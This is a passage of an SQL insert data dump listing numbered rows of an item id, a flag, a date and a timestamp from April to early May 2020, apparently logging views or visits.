03:02:01'),(2126,1600,1,'2020-04-01','2020-04-01 04:32:18'),(2127,89,1,'2020-04-01','2020-04-01 05:24:02'),(2128,2309,1,'2020-04-01','2020-04-01 07:10:10'),(2129,2309,1,'2020-04-01','2020-04-01 07:30:36'),(2130,2769,1,'2020-04-01','2020-04-01 09:30:02'),(2131,89,1,'2020-04-01','2020-04-01 10:19:36'),(2132,91,1,'2020-04-01','2020-04-01 10:23:04'),(2133,89,1,'2020-04-01','2020-04-01 10:40:34'),(2134,1582,1,'2020-04-01','2020-04-01 10:42:39'),(2135,89,1,'2020-04-01','2020-04-01 10:43:39'),(2136,1614,1,'2020-04-01','2020-04-01 10:43:50'),(2137,89,1,'2020-04-01','2020-04-01 10:45:22'),(2138,1612,1,'2020-04-01','2020-04-01 10:45:34'),(2139,91,1,'2020-04-01','2020-04-01 10:47:01'),(2140,91,1,'2020-04-01','2020-04-01 10:48:48'),(2141,1697,1,'2020-04-01','2020-04-01 10:49:34'),(2142,91,1,'2020-04-01','2020-04-01 10:50:12'),(2143,68,1,'2020-04-01','2020-04-01 10:51:29'),(2144,91,1,'2020-04-01','2020-04-01 10:51:32'),(2145,1747,1,'2020-04-01','2020-04-01 11:08:12'),(2146,76,1,'2020-04-01','2020-04-01 11:09:42'),(2147,91,1,'2020-04-01','2020-04-01 11:09:50'),(2148,91,1,'2020-04-01','2020-04-01 11:10:52'),(2149,89,1,'2020-04-01','2020-04-01 11:13:28'),(2150,1614,1,'2020-04-01','2020-04-01 11:13:38'),(2151,89,1,'2020-04-01','2020-04-01 11:17:55'),(2152,1588,1,'2020-04-01','2020-04-01 11:20:47'),(2153,89,1,'2020-04-01','2020-04-01 11:22:45'),(2154,76,1,'2020-04-01','2020-04-01 11:23:37'),(2155,72,1,'2020-04-01','2020-04-01 11:24:03'),(2156,76,1,'2020-04-01','2020-04-01 11:27:19'),(2157,89,1,'2020-04-01','2020-04-01 11:27:23'),(2158,2503,1,'2020-04-01','2020-04-01 11:27:42'),(2159,2503,1,'2020-04-01','2020-04-01 11:28:27'),(2160,2503,1,'2020-04-01','2020-04-01 11:29:21'),(2161,2503,1,'2020-04-01','2020-04-01 11:30:10'),(2162,2503,1,'2020-04-01','2020-04-01 11:30:29'),(2163,76,1,'2020-04-01','2020-04-01 11:40:33'),(2164,72,1,'2020-04-01','2020-04-01 11:40:44'),(2165,2503,1,'2020-04-01','2020-04-01 11:40:45'),(2166,72,1,'2020-04-01','2020-04-01 11:40:50'),(2167,72,1,'2020-04-01','2020-04-01 11:41:42'),(2168,2971,1,'2020-04-01','2020-04-01 11:41:57'),(2169,72,1,'2020-04-01','2020-04-01 11:42:25'),(2170,89,1,'2020-04-01','2020-04-01 11:49:52'),(2171,1711,1,'2020-04-01','2020-04-01 11:49:52'),(2172,1614,1,'2020-04-01','2020-04-01 11:50:25'),(2173,89,1,'2020-04-01','2020-04-01 11:55:54'),(2174,89,1,'2020-04-01','2020-04-01 11:56:00'),(2175,1582,1,'2020-04-01','2020-04-01 11:56:06'),(2176,1582,1,'2020-04-01','2020-04-01 11:56:13'),(2177,2503,1,'2020-04-01','2020-04-01 12:03:50'),(2178,89,1,'2020-04-01','2020-04-01 12:03:51'),(2179,80,1,'2020-04-01','2020-04-01 12:06:22'),(2180,89,1,'2020-04-01','2020-04-01 12:15:47'),(2181,89,1,'2020-04-01','2020-04-01 12:18:47'),(2182,89,1,'2020-04-01','2020-04-01 12:18:54'),(2183,2769,1,'2020-04-01','2020-04-01 12:37:57'),(2184,76,1,'2020-04-01','2020-04-01 12:39:10'),(2185,76,1,'2020-04-01','2020-04-01 12:39:37'),(2186,2503,1,'2020-04-01','2020-04-01 12:39:53'),(2187,2904,1,'2020-04-01','2020-04-01 12:40:04'),(2188,2769,1,'2020-04-01','2020-04-01 12:44:37'),(2189,2769,1,'2020-04-01','2020-04-01 12:54:06'),(2190,2904,1,'2020-04-01','2020-04-01 13:01:32'),(2191,2904,1,'2020-04-01','2020-04-01 13:02:44'),(2192,2904,1,'2020-04-01','2020-04-01 13:02:53'),(2193,2904,1,'2020-04-01','2020-04-01 13:03:07'),(2194,2609,1,'2020-04-01','2020-04-01 15:38:57'),(2195,2309,1,'2020-04-01','2020-04-01 15:41:57'),(2196,1600,1,'2020-04-01','2020-04-01 16:32:37'),(2197,2801,1,'2020-04-01','2020-04-01 18:05:41'),(2198,2801,1,'2020-04-01','2020-04-01 18:35:42'),(2199,1588,1,'2020-04-01','2020-04-01 20:03:20'),(2200,2609,1,'2020-04-01','2020-04-01 20:32:47'),(2201,1588,1,'2020-04-02','2020-04-02 04:55:22'),(2202,1604,1,'2020-04-02','2020-04-02 18:22:10'),(2203,1737,1,'2020-04-03','2020-04-03 05:15:57'),(2204,1737,1,'2020-04-03','2020-04-03 05:20:55'),(2205,89,1,'2020-04-03','2020-04-03 13:28:36'),(2206,80,1,'2020-04-03','2020-04-03 13:47:50'),(2207,80,1,'2020-04-03','2020-04-03 13:51:30'),(2208,2419,1,'2020-04-03','2020-04-03 13:52:47'),(2209,2419,1,'2020-04-03','2020-04-03 13:52:56'),(2210,80,1,'2020-04-03','2020-04-03 13:53:39'),(2211,80,1,'2020-04-03','2020-04-03 13:54:58'),(2212,91,1,'2020-04-03','2020-04-03 13:58:32'),(2213,91,1,'2020-04-03','2020-04-03 13:59:04'),(2214,1588,1,'2020-04-03','2020-04-03 14:13:59'),(2215,1588,1,'2020-04-03','2020-04-03 14:14:49'),(2216,89,1,'2020-04-03','2020-04-03 14:23:11'),(2217,91,1,'2020-04-03','2020-04-03 14:25:17'),(2218,91,1,'2020-04-03','2020-04-03 14:25:51'),(2219,1588,1,'2020-04-03','2020-04-03 14:28:22'),(2220,80,1,'2020-04-03','2020-04-03 15:05:56'),(2221,91,1,'2020-04-03','2020-04-03 15:26:25'),(2222,80,1,'2020-04-03','2020-04-03 15:49:33'),(2223,89,1,'2020-04-03','2020-04-03 16:00:10'),(2224,1586,1,'2020-04-03','2020-04-03 16:00:22'),(2225,1600,1,'2020-04-03','2020-04-03 18:08:54'),(2226,2457,1,'2020-04-06','2020-04-06 08:42:22'),(2227,108,1,'2020-04-06','2020-04-06 14:43:17'),(2228,108,1,'2020-04-06','2020-04-06 22:54:59'),(2229,108,1,'2020-04-06','2020-04-06 23:14:38'),(2230,108,1,'2020-04-06','2020-04-06 23:15:20'),(2231,2609,1,'2020-04-09','2020-04-09 00:18:05'),(2232,1730,1,'2020-04-09','2020-04-09 00:28:00'),(2233,2309,1,'2020-04-09','2020-04-09 01:38:25'),(2234,1600,1,'2020-04-09','2020-04-09 02:58:49'),(2235,1588,1,'2020-04-09','2020-04-09 03:38:18'),(2236,3045,1,'2020-04-09','2020-04-09 05:03:33'),(2237,2801,1,'2020-04-09','2020-04-09 05:31:38'),(2238,2410,1,'2020-04-09','2020-04-09 06:29:51'),(2239,89,1,'2020-04-09','2020-04-09 08:21:12'),(2240,1730,1,'2020-04-09','2020-04-09 09:01:36'),(2241,1600,1,'2020-04-09','2020-04-09 10:23:13'),(2242,80,1,'2020-04-09','2020-04-09 10:42:22'),(2243,76,1,'2020-04-09','2020-04-09 12:29:47'),(2244,76,1,'2020-04-09','2020-04-09 12:30:02'),(2245,108,1,'2020-04-09','2020-04-09 12:40:23'),(2246,1604,1,'2020-04-09','2020-04-09 13:23:05'),(2247,1588,1,'2020-04-09','2020-04-09 15:14:24'),(2248,1600,1,'2020-04-09','2020-04-09 15:22:44'),(2249,2609,1,'2020-04-09','2020-04-09 16:24:51'),(2250,2801,1,'2020-04-09','2020-04-09 16:45:37'),(2251,2457,1,'2020-04-09','2020-04-09 17:46:14'),(2252,2309,1,'2020-04-09','2020-04-09 19:55:49'),(2253,1730,1,'2020-04-09','2020-04-09 21:56:14'),(2254,3034,1,'2020-04-09','2020-04-09 23:46:48'),(2255,1588,1,'2020-04-09','2020-04-09 23:56:44'),(2256,2609,1,'2020-04-10','2020-04-10 02:46:31'),(2257,1741,1,'2020-04-10','2020-04-10 04:09:44'),(2258,2309,1,'2020-04-10','2020-04-10 07:08:20'),(2259,1600,1,'2020-04-10','2020-04-10 07:10:14'),(2260,1730,1,'2020-04-10','2020-04-10 07:28:41'),(2261,1730,1,'2020-04-10','2020-04-10 07:58:37'),(2262,1604,1,'2020-04-10','2020-04-10 08:08:48'),(2263,2813,1,'2020-04-10','2020-04-10 08:18:57'),(2264,2309,1,'2020-04-10','2020-04-10 08:38:49'),(2265,1588,1,'2020-04-10','2020-04-10 09:09:19'),(2266,1600,1,'2020-04-10','2020-04-10 09:59:17'),(2267,2609,1,'2020-04-10','2020-04-10 12:09:42'),(2268,2769,1,'2020-04-10','2020-04-10 13:01:40'),(2269,335,1,'2020-04-10','2020-04-10 13:30:05'),(2270,89,1,'2020-04-10','2020-04-10 13:50:28'),(2271,3045,1,'2020-04-10','2020-04-10 14:08:13'),(2272,2934,1,'2020-04-10','2020-04-10 14:20:37'),(2273,1604,1,'2020-04-10','2020-04-10 14:46:35'),(2274,1604,1,'2020-04-10','2020-04-10 14:46:39'),(2275,1604,1,'2020-04-10','2020-04-10 14:47:05'),(2276,1604,1,'2020-04-10','2020-04-10 14:57:21'),(2277,68,1,'2020-04-10','2020-04-10 15:50:44'),(2278,1730,1,'2020-04-10','2020-04-10 17:11:14'),(2279,1588,1,'2020-04-10','2020-04-10 19:02:05'),(2280,1600,1,'2020-04-10','2020-04-10 19:52:00'),(2281,2609,1,'2020-04-10','2020-04-10 21:43:36'),(2282,1730,1,'2020-04-11','2020-04-11 02:35:52'),(2283,2813,1,'2020-04-11','2020-04-11 04:42:46'),(2284,1600,1,'2020-04-11','2020-04-11 05:06:46'),(2285,3045,1,'2020-04-11','2020-04-11 05:25:17'),(2286,91,1,'2020-04-11','2020-04-11 05:46:43'),(2287,3034,1,'2020-04-11','2020-04-11 06:08:13'),(2288,84,1,'2020-04-11','2020-04-11 07:31:36'),(2289,2609,1,'2020-04-11','2020-04-11 07:56:49'),(2290,84,1,'2020-04-11','2020-04-11 08:55:29'),(2291,1870,1,'2020-04-11','2020-04-11 08:56:11'),(2292,84,1,'2020-04-11','2020-04-11 08:56:40'),(2293,335,1,'2020-04-11','2020-04-11 09:07:16'),(2294,2769,1,'2020-04-11','2020-04-11 09:37:26'),(2295,2813,1,'2020-04-11','2020-04-11 13:53:30'),(2296,1600,1,'2020-04-11','2020-04-11 14:28:54'),(2297,3045,1,'2020-04-11','2020-04-11 14:44:21'),(2298,2751,1,'2020-04-11','2020-04-11 15:56:47'),(2299,2751,1,'2020-04-11','2020-04-11 16:01:57'),(2300,3034,1,'2020-04-11','2020-04-11 16:21:08'),(2301,2775,1,'2020-04-11','2020-04-11 16:29:46'),(2302,2609,1,'2020-04-11','2020-04-11 17:09:46'),(2303,2609,1,'2020-04-11','2020-04-11 18:14:48'),(2304,1782,1,'2020-04-11','2020-04-11 18:15:34'),(2305,1730,1,'2020-04-11','2020-04-11 19:50:10'),(2306,2769,1,'2020-04-11','2020-04-11 20:30:09'),(2307,335,1,'2020-04-11','2020-04-11 21:41:47'),(2308,1600,1,'2020-04-11','2020-04-11 22:21:39'),(2309,72,1,'2020-04-11','2020-04-11 23:42:36'),(2310,2609,1,'2020-04-12','2020-04-12 02:23:28'),(2311,1730,1,'2020-04-12','2020-04-12 05:22:16'),(2312,1600,1,'2020-04-12','2020-04-12 09:43:29'),(2313,2609,1,'2020-04-12','2020-04-12 12:34:22'),(2314,1730,1,'2020-04-12','2020-04-12 15:24:57'),(2315,2309,1,'2020-04-12','2020-04-12 19:53:57'),(2316,2309,1,'2020-04-12','2020-04-12 20:56:44'),(2317,108,1,'2020-04-12','2020-04-12 22:38:43'),(2318,1606,1,'2020-04-12','2020-04-12 23:18:51'),(2319,335,1,'2020-04-12','2020-04-12 23:38:52'),(2320,1730,1,'2020-04-12','2020-04-12 23:49:00'),(2321,3045,1,'2020-04-13','2020-04-13 00:44:56'),(2322,2769,1,'2020-04-13','2020-04-13 01:19:40'),(2323,72,1,'2020-04-13','2020-04-13 06:12:48'),(2324,1730,1,'2020-04-13','2020-04-13 08:53:40'),(2325,2775,1,'2020-04-13','2020-04-13 11:16:23'),(2326,1604,1,'2020-04-13','2020-04-13 11:48:26'),(2327,1588,1,'2020-04-13','2020-04-13 14:35:19'),(2328,2609,1,'2020-04-13','2020-04-13 16:25:30'),(2329,3045,1,'2020-04-13','2020-04-13 17:26:20'),(2330,1730,1,'2020-04-13','2020-04-13 18:56:57'),(2331,1600,1,'2020-04-14','2020-04-14 01:56:49'),(2332,1745,1,'2020-04-14','2020-04-14 02:02:27'),(2333,1600,1,'2020-04-14','2020-04-14 02:06:26'),(2334,1715,1,'2020-04-14','2020-04-14 02:06:40'),(2335,1715,1,'2020-04-14','2020-04-14 02:11:39'),(2336,1600,1,'2020-04-14','2020-04-14 02:12:06'),(2337,1772,1,'2020-04-14','2020-04-14 02:12:42'),(2338,1600,1,'2020-04-14','2020-04-14 02:13:30'),(2339,1737,1,'2020-04-14','2020-04-14 02:13:45'),(2340,1600,1,'2020-04-14','2020-04-14 02:14:23'),(2341,108,1,'2020-04-14','2020-04-14 02:28:43'),(2342,108,1,'2020-04-14','2020-04-14 02:30:00'),(2343,1588,1,'2020-04-14','2020-04-14 16:21:20'),(2344,108,1,'2020-04-15','2020-04-15 02:17:55'),(2345,1600,1,'2020-04-15','2020-04-15 10:40:32'),(2346,1600,1,'2020-04-15','2020-04-15 12:55:09'),(2347,76,1,'2020-04-15','2020-04-15 13:00:40'),(2348,1600,1,'2020-04-15','2020-04-15 13:00:46'),(2349,1600,1,'2020-04-15','2020-04-15 13:34:33'),(2350,108,1,'2020-04-15','2020-04-15 21:54:56'),(2351,1588,1,'2020-04-16','2020-04-16 03:29:28'),(2352,1730,1,'2020-04-16','2020-04-16 03:41:22'),(2353,1600,1,'2020-04-16','2020-04-16 04:51:20'),(2354,2609,1,'2020-04-16','2020-04-16 09:21:49'),(2355,80,1,'2020-04-16','2020-04-16 11:23:11'),(2356,1588,1,'2020-04-16','2020-04-16 12:02:28'),(2357,72,1,'2020-04-16','2020-04-16 12:12:23'),(2358,3045,1,'2020-04-16','2020-04-16 12:38:05'),(2359,2769,1,'2020-04-16','2020-04-16 12:43:02'),(2360,1730,1,'2020-04-16','2020-04-16 13:33:48'),(2361,1588,1,'2020-04-16','2020-04-16 14:23:09'),(2362,1600,1,'2020-04-16','2020-04-16 16:34:10'),(2363,2609,1,'2020-04-16','2020-04-16 18:25:20'),(2364,1606,1,'2020-04-16','2020-04-16 18:40:33'),(2365,68,1,'2020-04-16','2020-04-16 19:55:51'),(2366,1588,1,'2020-04-16','2020-04-16 22:06:54'),(2367,1730,1,'2020-04-16','2020-04-16 22:37:01'),(2368,3045,1,'2020-04-17','2020-04-17 00:38:48'),(2369,1600,1,'2020-04-17','2020-04-17 02:10:21'),(2370,72,1,'2020-04-17','2020-04-17 02:27:22'),(2371,2609,1,'2020-04-17','2020-04-17 03:27:51'),(2372,2769,1,'2020-04-17','2020-04-17 04:08:38'),(2373,80,1,'2020-04-17','2020-04-17 04:38:36'),(2374,80,1,'2020-04-17','2020-04-17 04:39:38'),(2375,89,1,'2020-04-17','2020-04-17 05:01:51'),(2376,2410,1,'2020-04-17','2020-04-17 05:21:46'),(2377,1588,1,'2020-04-17','2020-04-17 07:33:06'),(2378,1604,1,'2020-04-17','2020-04-17 12:00:49'),(2379,2609,1,'2020-04-17','2020-04-17 12:37:18'),(2380,80,1,'2020-04-17','2020-04-17 12:59:48'),(2381,3045,1,'2020-04-17','2020-04-17 13:12:26'),(2382,72,1,'2020-04-17','2020-04-17 13:26:49'),(2383,2769,1,'2020-04-17','2020-04-17 13:46:50'),(2384,2309,1,'2020-04-17','2020-04-17 15:06:48'),(2385,80,1,'2020-04-17','2020-04-17 15:17:01'),(2386,1588,1,'2020-04-17','2020-04-17 16:18:08'),(2387,2309,1,'2020-04-17','2020-04-17 18:04:39'),(2388,335,1,'2020-04-17','2020-04-17 19:00:33'),(2389,2609,1,'2020-04-17','2020-04-17 20:22:28'),(2390,2609,1,'2020-04-17','2020-04-17 22:11:37'),(2391,3045,1,'2020-04-17','2020-04-17 22:58:39'),(2392,2769,1,'2020-04-17','2020-04-17 23:21:34'),(2393,2309,1,'2020-04-18','2020-04-18 02:32:10'),(2394,1588,1,'2020-04-18','2020-04-18 03:12:50'),(2395,72,1,'2020-04-18','2020-04-18 03:22:38'),(2396,335,1,'2020-04-18','2020-04-18 04:33:14'),(2397,1730,1,'2020-04-18','2020-04-18 05:53:22'),(2398,80,1,'2020-04-18','2020-04-18 07:03:19'),(2399,2769,1,'2020-04-18','2020-04-18 08:24:04'),(2400,2609,1,'2020-04-18','2020-04-18 10:15:19'),(2401,108,1,'2020-04-18','2020-04-18 13:29:45'),(2402,1604,1,'2020-04-19','2020-04-19 13:34:56'),(2403,1588,1,'2020-04-19','2020-04-19 18:07:03'),(2404,2309,1,'2020-04-19','2020-04-19 22:31:26'),(2405,1588,1,'2020-04-20','2020-04-20 02:53:18'),(2406,2993,1,'2020-04-20','2020-04-20 02:59:17'),(2407,2989,1,'2020-04-20','2020-04-20 03:01:12'),(2408,1780,1,'2020-04-20','2020-04-20 03:03:55'),(2409,1749,1,'2020-04-20','2020-04-20 03:05:13'),(2410,1751,1,'2020-04-20','2020-04-20 03:05:34'),(2411,1768,1,'2020-04-20','2020-04-20 03:06:20'),(2412,1772,1,'2020-04-20','2020-04-20 03:06:52'),(2413,2156,1,'2020-04-20','2020-04-20 03:07:38'),(2414,2248,1,'2020-04-20','2020-04-20 03:08:19'),(2415,2252,1,'2020-04-20','2020-04-20 03:09:01'),(2416,2991,1,'2020-04-20','2020-04-20 03:09:22'),(2417,2993,1,'2020-04-20','2020-04-20 03:10:13'),(2418,2297,1,'2020-04-20','2020-04-20 03:10:36'),(2419,1695,1,'2020-04-20','2020-04-20 03:12:00'),(2420,1709,1,'2020-04-20','2020-04-20 03:12:34'),(2421,1732,1,'2020-04-20','2020-04-20 03:13:41'),(2422,1734,1,'2020-04-20','2020-04-20 03:14:27'),(2423,1743,1,'2020-04-20','2020-04-20 03:16:57'),(2424,1745,1,'2020-04-20','2020-04-20 03:17:23'),(2425,1747,1,'2020-04-20','2020-04-20 03:18:17'),(2426,91,1,'2020-04-20','2020-04-20 03:18:43'),(2427,1747,1,'2020-04-20','2020-04-20 03:51:32'),(2428,2775,1,'2020-04-20','2020-04-20 03:52:01'),(2429,1780,1,'2020-04-20','2020-04-20 04:41:00'),(2430,1588,1,'2020-04-20','2020-04-20 04:42:41'),(2431,2457,1,'2020-04-20','2020-04-20 08:21:17'),(2432,76,1,'2020-04-20','2020-04-20 08:24:55'),(2433,91,1,'2020-04-20','2020-04-20 08:29:09'),(2434,1751,1,'2020-04-20','2020-04-20 08:30:08'),(2435,91,1,'2020-04-20','2020-04-20 08:32:56'),(2436,2658,1,'2020-04-20','2020-04-20 08:41:13'),(2437,91,1,'2020-04-20','2020-04-20 08:44:29'),(2438,1604,1,'2020-04-20','2020-04-20 13:59:12'),(2439,2956,1,'2020-04-21','2020-04-21 09:31:31'),(2440,1604,1,'2020-04-21','2020-04-21 16:21:23'),(2441,91,1,'2020-04-21','2020-04-21 16:23:46'),(2442,108,1,'2020-04-21','2020-04-21 16:25:18'),(2443,2956,1,'2020-04-21','2020-04-21 20:05:04'),(2444,1600,1,'2020-04-21','2020-04-21 21:00:53'),(2445,2801,1,'2020-04-22','2020-04-22 01:01:20'),(2446,2309,1,'2020-04-22','2020-04-22 03:32:09'),(2447,1588,1,'2020-04-22','2020-04-22 03:44:27'),(2448,2609,1,'2020-04-22','2020-04-22 05:02:47'),(2449,1600,1,'2020-04-22','2020-04-22 10:52:06'),(2450,91,1,'2020-04-22','2020-04-22 12:44:00'),(2451,1600,1,'2020-04-22','2020-04-22 14:41:21'),(2452,87,1,'2020-04-22','2020-04-22 14:41:51'),(2453,486,1,'2020-04-22','2020-04-22 14:43:13'),(2454,2309,1,'2020-04-22','2020-04-22 15:23:01'),(2455,1588,1,'2020-04-22','2020-04-22 16:03:25'),(2456,2801,1,'2020-04-22','2020-04-22 17:55:55'),(2457,2609,1,'2020-04-22','2020-04-22 18:13:58'),(2458,486,1,'2020-04-22','2020-04-22 18:27:22'),(2459,2751,1,'2020-04-22','2020-04-22 18:54:16'),(2460,486,1,'2020-04-22','2020-04-22 19:23:17'),(2461,1600,1,'2020-04-22','2020-04-22 23:50:38'),(2462,2309,1,'2020-04-23','2020-04-23 00:51:24'),(2463,1588,1,'2020-04-23','2020-04-23 01:01:33'),(2464,2801,1,'2020-04-23','2020-04-23 03:47:12'),(2465,2609,1,'2020-04-23','2020-04-23 05:42:18'),(2466,1588,1,'2020-04-23','2020-04-23 08:09:41'),(2467,1726,1,'2020-04-23','2020-04-23 08:10:17'),(2468,1588,1,'2020-04-23','2020-04-23 08:11:24'),(2469,91,1,'2020-04-23','2020-04-23 08:12:04'),(2470,1588,1,'2020-04-23','2020-04-23 08:17:41'),(2471,91,1,'2020-04-23','2020-04-23 08:17:45'),(2472,2813,1,'2020-04-23','2020-04-23 08:25:33'),(2473,1600,1,'2020-04-23','2020-04-23 09:03:05'),(2474,1718,1,'2020-04-23','2020-04-23 09:57:13'),(2475,2309,1,'2020-04-23','2020-04-23 10:03:55'),(2476,80,1,'2020-04-23','2020-04-23 10:24:09'),(2477,1713,1,'2020-04-23','2020-04-23 10:52:46'),(2478,1600,1,'2020-04-23','2020-04-23 10:54:00'),(2479,91,1,'2020-04-23','2020-04-23 10:54:00'),(2480,2801,1,'2020-04-23','2020-04-23 13:19:23'),(2481,2309,1,'2020-04-23','2020-04-23 13:34:55'),(2482,87,1,'2020-04-23','2020-04-23 14:08:45'),(2483,473,1,'2020-04-23','2020-04-23 14:09:38'),(2484,87,1,'2020-04-23','2020-04-23 14:12:53'),(2485,486,1,'2020-04-23','2020-04-23 14:13:34'),(2486,2609,1,'2020-04-23','2020-04-23 15:05:46'),(2487,89,1,'2020-04-23','2020-04-23 15:16:06'),(2488,1588,1,'2020-04-23','2020-04-23 15:26:10'),(2489,1588,1,'2020-04-23','2020-04-23 15:51:14'),(2490,1588,1,'2020-04-23','2020-04-23 15:51:17'),(2491,1588,1,'2020-04-23','2020-04-23 15:51:20'),(2492,1588,1,'2020-04-23','2020-04-23 15:51:21'),(2493,1588,1,'2020-04-23','2020-04-23 15:51:26'),(2494,2769,1,'2020-04-23','2020-04-23 16:26:37'),(2495,1606,1,'2020-04-23','2020-04-23 16:48:43'),(2496,2309,1,'2020-04-23','2020-04-23 21:28:11'),(2497,1600,1,'2020-04-23','2020-04-23 22:39:09'),(2498,1588,1,'2020-04-23','2020-04-23 23:09:19'),(2499,1588,1,'2020-04-24','2020-04-24 04:01:40'),(2500,1600,1,'2020-04-24','2020-04-24 08:42:18'),(2501,1741,1,'2020-04-24','2020-04-24 12:40:50'),(2502,1588,1,'2020-04-24','2020-04-24 13:44:51'),(2503,1600,1,'2020-04-24','2020-04-24 17:06:38'),(2504,2309,1,'2020-04-24','2020-04-24 18:37:02'),(2505,80,1,'2020-04-24','2020-04-24 22:30:25'),(2506,1588,1,'2020-04-24','2020-04-24 23:38:45'),(2507,2609,1,'2020-04-25','2020-04-25 01:31:59'),(2508,1600,1,'2020-04-25','2020-04-25 02:29:24'),(2509,1730,1,'2020-04-25','2020-04-25 07:31:34'),(2510,2309,1,'2020-04-25','2020-04-25 07:51:33'),(2511,1588,1,'2020-04-25','2020-04-25 09:11:39'),(2512,2991,1,'2020-04-25','2020-04-25 09:21:57'),(2513,1600,1,'2020-04-25','2020-04-25 12:12:35'),(2514,2993,1,'2020-04-25','2020-04-25 16:19:16'),(2515,1588,1,'2020-04-25','2020-04-25 21:03:17'),(2516,1600,1,'2020-04-25','2020-04-25 22:13:06'),(2517,2309,1,'2020-04-25','2020-04-25 23:33:40'),(2518,1600,1,'2020-04-25','2020-04-25 23:39:14'),(2519,1606,1,'2020-04-26','2020-04-26 01:02:23'),(2520,474,1,'2020-04-26','2020-04-26 07:29:06'),(2521,1600,1,'2020-04-26','2020-04-26 07:32:33'),(2522,1600,1,'2020-04-26','2020-04-26 08:36:05'),(2523,1588,1,'2020-04-26','2020-04-26 09:07:38'),(2524,1600,1,'2020-04-26','2020-04-26 10:05:44'),(2525,2658,1,'2020-04-26','2020-04-26 10:22:46'),(2526,91,1,'2020-04-26','2020-04-26 10:56:47'),(2527,2609,1,'2020-04-26','2020-04-26 13:46:37'),(2528,2993,1,'2020-04-26','2020-04-26 15:36:58'),(2529,1600,1,'2020-04-26','2020-04-26 18:02:49'),(2530,1600,1,'2020-04-26','2020-04-26 21:00:07'),(2531,1730,1,'2020-04-26','2020-04-26 21:50:04'),(2532,2609,1,'2020-04-26','2020-04-26 23:20:56'),(2533,2801,1,'2020-04-27','2020-04-27 02:32:22'),(2534,80,1,'2020-04-27','2020-04-27 05:53:44'),(2535,1600,1,'2020-04-27','2020-04-27 06:13:49'),(2536,1774,1,'2020-04-27','2020-04-27 06:24:16'),(2537,1730,1,'2020-04-27','2020-04-27 07:44:54'),(2538,2801,1,'2020-04-27','2020-04-27 11:15:29'),(2539,2609,1,'2020-04-27','2020-04-27 13:37:36'),(2540,91,1,'2020-04-27','2020-04-27 15:21:22'),(2541,80,1,'2020-04-27','2020-04-27 16:08:32'),(2542,3030,1,'2020-04-28','2020-04-28 09:37:29'),(2543,2609,1,'2020-04-28','2020-04-28 11:24:25'),(2544,1600,1,'2020-04-28','2020-04-28 13:09:57'),(2545,1600,1,'2020-04-28','2020-04-28 13:10:02'),(2546,1600,1,'2020-04-28','2020-04-28 13:10:03'),(2547,570,1,'2020-04-28','2020-04-28 13:48:51'),(2548,2309,1,'2020-04-28','2020-04-28 13:55:25'),(2549,1600,1,'2020-04-28','2020-04-28 15:15:09'),(2550,1604,1,'2020-04-28','2020-04-28 15:24:22'),(2551,1588,1,'2020-04-28','2020-04-28 18:08:49'),(2552,1588,1,'2020-04-28','2020-04-28 18:25:40'),(2553,1600,1,'2020-04-28','2020-04-28 18:31:58'),(2554,1600,1,'2020-04-28','2020-04-28 18:33:20'),(2555,3030,1,'2020-04-28','2020-04-28 19:55:35'),(2556,2993,1,'2020-04-29','2020-04-29 00:25:28'),(2557,2309,1,'2020-04-29','2020-04-29 00:50:11'),(2558,1600,1,'2020-04-29','2020-04-29 02:40:45'),(2559,1588,1,'2020-04-29','2020-04-29 04:30:48'),(2560,3030,1,'2020-04-29','2020-04-29 05:21:38'),(2561,68,1,'2020-04-29','2020-04-29 07:27:34'),(2562,74,1,'2020-04-29','2020-04-29 07:32:21'),(2563,2503,1,'2020-04-29','2020-04-29 07:33:09'),(2564,108,1,'2020-04-29','2020-04-29 07:33:11'),(2565,76,1,'2020-04-29','2020-04-29 07:46:29'),(2566,72,1,'2020-04-29','2020-04-29 07:51:43'),(2567,2557,1,'2020-04-29','2020-04-29 07:52:07'),(2568,1606,1,'2020-04-29','2020-04-29 08:22:57'),(2569,2801,1,'2020-04-29','2020-04-29 09:16:46'),(2570,1604,1,'2020-04-29','2020-04-29 15:16:46'),(2571,108,1,'2020-04-29','2020-04-29 17:00:15'),(2572,1600,1,'2020-04-29','2020-04-29 17:33:19'),(2573,1745,1,'2020-04-29','2020-04-29 17:36:18'),(2574,2989,1,'2020-04-29','2020-04-29 17:37:11'),(2575,1745,1,'2020-04-29','2020-04-29 17:37:51'),(2576,1600,1,'2020-04-29','2020-04-29 17:37:58'),(2577,1606,1,'2020-04-29','2020-04-29 22:02:00'),(2578,1600,1,'2020-04-29','2020-04-29 22:10:35'),(2579,108,1,'2020-04-29','2020-04-29 23:12:33'),(2580,1600,1,'2020-04-30','2020-04-30 00:10:49'),(2581,108,1,'2020-04-30','2020-04-30 03:44:04'),(2582,1709,1,'2020-04-30','2020-04-30 04:25:56'),(2583,2410,1,'2020-04-30','2020-04-30 11:36:55'),(2584,108,1,'2020-04-30','2020-04-30 15:59:31'),(2585,2804,1,'2020-04-30','2020-04-30 22:32:29'),(2586,1604,1,'2020-05-01','2020-05-01 07:47:46'),(2587,2751,1,'2020-05-01','2020-05-01 15:12:02'),(2588,84,1,'2020-05-02','2020-05-02 03:36:54'),(2589,1730,1,'2020-05-02','2020-05-02 05:45:54'),(2590,3030,1,'2020-05-02','2020-05-02 09:14:55'),(2591,482,1,'2020-05-02','2020-05-02 11:07:23'),(2592,2801,1,'2020-05-02','2020-05-02 11:42:02'),(2593,1600,1,'2020-05-02','2020-05-02 12:18:11'),(2594,2309,1,'2020-05-02','2020-05-02 12:58:59'),(2595,1588,1,'2020-05-02','2020-05-02 14:38:08'),(2596,2609,1,'2020-05-02','2020-05-02 16:28:29'),(2597,3030,1,'2020-05-02','2020-05-02 19:40:18'),(2598,2658,1,'2020-05-02','2020-05-02 19:44:38'),(2599,2609,1,'2020-05-03','2020-05-03 02:12:37'),(2600,1600,1,'2020-05-03','2020-05-03 06:44:46'),(2601,2309,1,'2020-05-03','2020-05-03 07:14:29'),(2602,1588,1,'2020-05-03','2020-05-03 08:44:54'),(2603,482,1,'2020-05-03','2020-05-03 09:04:54'),(2604,2801,1,'2020-05-03','2020-05-03 09:10:10'),(2605,1600,1,'2020-05-03','2020-05-03 09:36:07'),(2606,570,1,'2020-05-03','2020-05-03 12:24:37'),(2607,2934,1,'2020-05-03','2020-05-03 14:42:13'),(2608,2801,1,'2020-05-03','2020-05-03 21:39:59'),(2609,1600,1,'2020-05-03','2020-05-03 22:29:58'),(2610,1718,1,'2020-05-04','2020-05-04 04:41:46'),(2611,108,1,'2020-05-04','2020-05-04 05:41:59'),(2612,1588,1,'2020-05-04','2020-05-04 06:35:29'),(2613,1600,1,'2020-05-04','2020-05-04 